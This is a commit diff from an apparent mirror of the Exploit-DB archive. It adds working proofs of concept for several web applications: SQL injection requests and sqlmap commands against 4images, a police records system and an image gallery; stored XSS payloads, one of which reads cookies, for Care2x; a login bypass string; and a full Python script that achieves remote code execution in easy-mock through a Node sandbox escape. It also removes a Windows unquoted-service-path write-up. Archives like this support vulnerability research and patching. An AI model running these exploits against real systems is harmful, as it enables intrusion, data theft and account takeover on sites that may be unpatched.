bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-08-14

Browse source 
9 changes to exploits/shellcodes

ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path
4images 1.8 - 'limitnumber' SQL Injection (Authenticated)
easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
Police Crime Record Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
Police Crime Record Management System 1.0 - 'casedetails' SQL Injection
Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS
Simple Image Gallery System 1.0 - 'id' SQL Injection
RATES SYSTEM 1.0 - Authentication Bypass
This commit is contained in:
Offensive Security 2021-08-14 05:01:54 +00:00
parent 0025db717f
commit 8251bd238f
9 changed files with 415 additions and 40 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

118
exploits/php/webapps/50193.txt Normal file
View file

@ -0,0 +1,118 @@
# Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection (Authenticated)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.8
# Tested on: Linux
Source Analysis:
Line #658
- User action defined
if ($action == "findimages") {
Line #661
- Vulnerable condition
$condition = "1=1";
Line #654
- Default limit 50
show_input_row($lang['results_per_page'], "limitnumber", 50);
Line #736
- Define limit start
$limitstart = (isset($HTTP_POST_VARS['limitstart'])) ? trim($HTTP_POST_VARS['limitstart']) : "";
if ($limitstart == "") {
$limitstart = 0;
Line #743
- Define limit number
$limitnumber = trim($HTTP_POST_VARS['limitnumber']);
if ($limitnumber == "") {
$limitnumber = 5000;
}
Line #763
- Define user input variables
$limitfinish = $limitstart + $limitnumber;
Line #786
- SQL statement
$sql = "SELECT i.image_id, i.cat_id, i.user_id, i.image_name, i.image_media_file, i.image_date".get_user_table_field(", u.", "user_name")."
FROM ".IMAGES_TABLE." i
LEFT JOIN ".USERS_TABLE." u ON (".get_user_table_field("u.", "user_id")." = i.user_id)
WHERE $condition
ORDER BY $orderby $direction
// Vulnerable user input of limitnumber
LIMIT $limitstart, $limitnumber";
Line #852
- Display user input defined previously
show_hidden_input("limitnumber", $limitnumber);
Exploit POC:
1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-
HTTP Request:
POST /4images/admin/images.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 406
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/4images/admin/images.php?action=modifyimages
Cookie: 4images_lastvisit=1628349389; 4images_userid=1; sessionid=7ndqdr2u04gqs9gdme12vhco87
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
__csrf=7aa2dd8597dfe4302237bbfeb200fbd8&action=findimages&image_id=&image_name=&image_description=&image_keywords=&cat_id=0&image_media_file=&image_thumb_file=&dateafter=&datebefore=&downloadsupper=&downloadslower=&ratingupper=&ratinglower=&votesupper=&voteslower=&hitsupper=&hitslower=&orderby=i.image_name&direction=ASC&limitnumber=1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+-
HTTP Response:
HTTP/1.1 200 OK
...
<b>XPATH syntax error: ':10.1.37-MariaDB'</b>

13
exploits/php/webapps/50195.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Police Crime Record Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 12/08/2021
# Exploit Author: Ömer Hasan Durmuş
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: v1.0
# Category: Webapps
# Tested on: Linux/Windows
Step 1 : Login to admin account in http://TARGET/ghpolice/login.php default credentials. (1111:admin123)
Step 2 : Then click on the "Add Staff"
Step 3 : Input "<img src=x onerror=alert(1)>" in the field "Firstname" or "Othernames"
Step 4 : Click on "Save and Continue"
Step 5 : Update page.

54
exploits/php/webapps/50196.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Police Crime Record Management System 1.0 - 'casedetails' SQL Injection
# Date: 12/08/2021
# Exploit Author: Ömer Hasan Durmuş
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: v1.0
# Category: Webapps
# Tested on: Linux/Windows
Step 1 : Login CID account in http://TARGET/ghpolice/login.php default credentials. (005:12345)
STEP 2 : Send the following request
or
Use sqlmap : python sqlmap.py -u "
http://TARGET/ghpolice/cid/casedetails.php?id=210728101"
--cookie="PHPSESSID=ev8vn1d1de5hjrv9273dunao8j" --dbs -vv
# Request
GET
/ghpolice/cid/casedetails.php?id=210728101'+AND+(SELECT+2115+FROM+(SELECT(SLEEP(5)))GQtj)+AND'gKJE'='gKJE
HTTP/1.1
Host: target.com
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://target.com/ghpolice/cid/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ev8vn1d1de5hjrv9273dunao8j
Connection: close
# Response after 5 seconds
HTTP/1.1 200 OK
Date: Thu, 12 Aug 2021 21:32:47 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
X-Powered-By: PHP/7.4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6913
Connection: close
Content-Type: text/html; charset=UTF-8
...
...
...

96
exploits/php/webapps/50197.txt Normal file
View file

@ -0,0 +1,96 @@
# Exploit Title: Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS
# Date: 13.08.2021
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://care2x.org
# Software Link: https://sourceforge.net/projects/care2002/
# Version: =< 2.7 Alpha
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com
'''
DESCRIPTION
Stored Cross Site Scripting(XSS) vulnerability in Care2x Hospital Information Management 2.7 Alpha. The vulnerability has found POST requests in /modules/registration_admission/patient_register.php page with "name_middle", "addr_str", "station", "name_maiden", "name_2", "name_3" parameters.
Example: /modules/registration_admission/patient_register.php POST request
Content-Disposition: form-data; name="date_reg"
2021-07-29 12:15:59
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="title"
asd
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_last"
asd
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_first"
asd
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_2"
XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_3"
XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_middle"
XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_maiden"
XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="name_others"
XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="date_birth"
05/07/2021
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="sex"
m
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="addr_str"
XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="addr_str_nr"
XSS
-----------------------------29836624427276403321197241205
Content-Disposition: form-data; name="addr_zip"
XSS
---------------------
If an attacker exploit this vulnerability, takeover any account wants.
Payload Used:
"><script>alert(document.cookie)</script>
EXPLOITATION
1- Login to Care2x Panel
2- /modules/registration_admission/patient_register.php
3- Use the payload vulnerable parameters.
ABOUT SECURITY FOR EVERYONE TEAM
We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
'''

47
exploits/php/webapps/50198.txt Normal file
View file

@ -0,0 +1,47 @@
# Exploit Title: Simple Image Gallery System 1.0 - 'id' SQL Injection
# Date: 2020-08-12
# Exploit Author: Azumah Foresight Xorlali (M4sk0ff)
# Vendor Homepage: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14903&title=Simple+Image+Gallery+Web+App+using+PHP+Free+Source+Code
# Version: Version 1.0
# Category: Web Application
# Tested on: Kali Linux
Description:
Simple Image Gallery System 1.0 application is vulnerable to
SQL injection via the "id" parameter on the album page.
POC:
Step 1. Login to the application with any verified user credentials
Step 2. Click on Albums page and select an albums if created or create
by clicking on "Add New" on the top right and select the album.
Step 3. Click on an image and capture the request in burpsuite.
Now copy the request and save it as test.req .
Step 4. Run the sqlmap command "sqlmap -r test.req --dbs
Step 5. This will inject successfully and you will have an information
disclosure of all databases contents.
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3' AND 7561=7561 AND 'SzOW'='SzOW
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: id=3' OR (SELECT 9448 FROM(SELECT
COUNT(*),CONCAT(0x7178707071,(SELECT
(ELT(9448=9448,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'SXqA'='SXqA
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3' AND (SELECT 1250 FROM (SELECT(SLEEP(5)))aNMX) AND
'qkau'='qkau
---

16
exploits/php/webapps/50199.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: RATES SYSTEM 1.0 - Authentication Bypass
# Date: 2020-08-13
# Exploit Author: Azumah Foresight Xorlali (M4sk0ff)
# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14904&title=RATES+SYSTEM+in+PHP+Free+Source+Code
# Version: Version 1.0
# Category: Web Application
# Tested on: Kali Linux
Description: The authentication bypass vulnerability on the application allows an attacker to log in as Client. This vulnerability affects the "username" parameter on the client login page: http://localhost/rates/login.php
Step 1: On the login page, simply use the query inside the bracket ( ' OR 1 -- - ) as username
Step 2: On the login page, use same query{ ' OR 1 -- -} or anything as password
All set you should be logged in as Client.

39
exploits/windows/local/50048.txt
View file

@ -1,39 +0,0 @@
# Exploit Title: ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path
# Date: 2021-06-21
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.asus.com/
# Software Link: https://dlcdnets.asus.com/pub/ASUS/LCD%20Monitors/MB16ACE/ASUS_DisplayWidget_3.4.0.036.exe.zip
# Version: 3.4.0.036
# Service File Version 1.0.0.1
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%ASUSDisplayWidgetService%"' get displayname, pathname, startmode, startname
DisplayName PathName StartMode StartName
ASUS DisplayWidget Service by Portrait Displays C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "ASUSDisplayWidgetService"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ASUSDisplayWidgetService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Portrait Displays\ASUS DisplayWidget\DisplayWidgetService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : ASUS DisplayWidget Service by Portrait Displays
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.

64
exploits/windows/webapps/50194.py Executable file
View file

@ -0,0 +1,64 @@
# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 12/08/2021
# Exploit Author: LionTree
# Vendor Homepage: https://github.com/easy-mock
# Software Link: https://github.com/easy-mock/easy-mock
# Version: 1.5.0-1.6.0
# Tested on: windows 10(node v8.17.0)
import requests
import json
import random
import string
target = 'http://127.0.0.1:7300'
username = ''.join(random.sample(string.ascii_letters + string.digits, 8))
password = ''.join(random.sample(string.ascii_letters + string.digits, 8))
print(username)
print(password)
# can't see the result of command
cmd = 'calc.exe'
# register
url = target + "/api/u/register"
cookies = {"SSO_LANG_V2": "EN"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
json_data={"name": username, "password": password}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# login
url = target + "/api/u/login"
cookies = {"SSO_LANG_V2": "EN"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
json_data={"name": username, "password": password}
req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text
login = json.loads(req)
token = login['data']['token']
# create project
url = target + "/api/project/create"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# get project_id
url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
req = requests.get(url, headers=headers, cookies=cookies).text
projects = json.loads(req)
project_id = projects['data'][0]['_id']
# create mock
url = target + "/api/mock/create"
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
json_data={"description": "poc", "method": "get", "mode": "{\n 'foo': 'Syntax Demo',\n 'name': function() {\n return (function() {\n TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n try {\n Object.preventExtensions(Buffer.from(\"\")).a = 1;\n } catch (e) {\n return e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n }\n })();\n }\n}", "project_id": project_id, "url": "/" + username}
requests.post(url, headers=headers, cookies=cookies, json=json_data)
# preview mock
url = target + "/mock/{}/{}/{}".format(project_id,username,username)
cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"}
requests.get(url, headers=headers, cookies=cookies)

8
files_exploits.csv
View file

@ -11374,7 +11374,6 @@ id,file,description,date,author,type,platform,port
50040,exploits/windows/local/50040.txt,"iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows, 50040,exploits/windows/local/50040.txt,"iFunbox 4.2 - 'Apple Mobile Device Service' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows, 50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows, 50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows, 50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows,
50130,exploits/windows/local/50130.py,"Argus Surveillance DVR 4.0 - Weak Password Encryption",2021-07-16,"Salman Asad",local,windows, 50130,exploits/windows/local/50130.py,"Argus Surveillance DVR 4.0 - Weak Password Encryption",2021-07-16,"Salman Asad",local,windows,
50135,exploits/linux/local/50135.c,"Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation",2021-07-15,TheFloW,local,linux, 50135,exploits/linux/local/50135.c,"Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation",2021-07-15,TheFloW,local,linux,
@ -44322,3 +44321,10 @@ id,file,description,date,author,type,platform,port
50190,exploits/php/webapps/50190.txt,"COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection",2021-08-12,"Ashish Upsham",webapps,php, 50190,exploits/php/webapps/50190.txt,"COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection",2021-08-12,"Ashish Upsham",webapps,php,
50191,exploits/multiple/webapps/50191.txt,"Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)",2021-08-12,"RedTeam Pentesting GmbH",webapps,multiple, 50191,exploits/multiple/webapps/50191.txt,"Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)",2021-08-12,"RedTeam Pentesting GmbH",webapps,multiple,
50192,exploits/php/webapps/50192.txt,"RATES SYSTEM 1.0 - 'Multiple' SQL Injections",2021-08-12,"Halit AKAYDIN",webapps,php, 50192,exploits/php/webapps/50192.txt,"RATES SYSTEM 1.0 - 'Multiple' SQL Injections",2021-08-12,"Halit AKAYDIN",webapps,php,
50193,exploits/php/webapps/50193.txt,"4images 1.8 - 'limitnumber' SQL Injection (Authenticated)",2021-08-13,"Andrey Stoykov",webapps,php,
50194,exploits/windows/webapps/50194.py,"easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated)",2021-08-13,LionTree,webapps,windows,
50195,exploits/php/webapps/50195.txt,"Police Crime Record Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-08-13,"Ömer Hasan Durmuş",webapps,php,
50196,exploits/php/webapps/50196.txt,"Police Crime Record Management System 1.0 - 'casedetails' SQL Injection",2021-08-13,"Ömer Hasan Durmuş",webapps,php,
50197,exploits/php/webapps/50197.txt,"Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS",2021-08-13,securityforeveryone.com,webapps,php,
50198,exploits/php/webapps/50198.txt,"Simple Image Gallery System 1.0 - 'id' SQL Injection",2021-08-13,"Azumah Foresight Xorlali",webapps,php,
50199,exploits/php/webapps/50199.txt,"RATES SYSTEM 1.0 - Authentication Bypass",2021-08-13,"Azumah Foresight Xorlali",webapps,php,

Can't render this file because it is too large.